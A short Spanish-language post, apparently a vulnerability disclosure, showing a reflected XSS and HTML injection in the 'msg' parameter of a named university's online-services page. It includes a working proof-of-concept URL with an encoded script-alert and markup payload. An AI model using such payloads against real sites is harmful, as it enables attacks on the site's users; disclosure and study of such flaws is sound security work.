[xss & html injection] En sitio de la Universidad Catolica Del Norte

Esta será una publicación corta, sin mayor análisis.

El sitio web de la Universidad Catolica del Norte UCN, nos dirijimos a la siguiente Url :   https://online.ucn.cl/onlineucn/activar_cuenta/ para activar una cuenta:

Introducimos cualquier Rut incorrecto para generar el error:

La ruta completa queda como:

https://online.ucn.cl/onlineucn/aviso.asp?msg=Estimado+usuario+usted+no+esta+registrado+en+los+Servicios+OnLineUCN.%3Cbr%3E%3Cbr%3E%3Cdiv+aling%3D%27left%27%3ESi+esta+situaci%26oacute%3Bn+no+es+normal%2C%3Cbr%3Epor+favor%26nbsp%3B%3Ca+href%3D%27javascript%3Acontacto%28%29%3B%27%3EEnv%26iacute%3Benos+sus+consultas%3C%2Fa%3E

Cambiamos el valor a la variable msg= y obtenemos nuestra prueba de concepto.
Xss + Html injection:

https://online.ucn.cl/onlineucn/aviso.asp?msg=%27%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E%3Cp%3E%3Cfont%20size=4%3E%3Ccenter%3E%3Cmarquee%3E%3Ch1%3EPrueba%20Concepto%3C/h1%3E%3C/marquee%3E

@Shinee_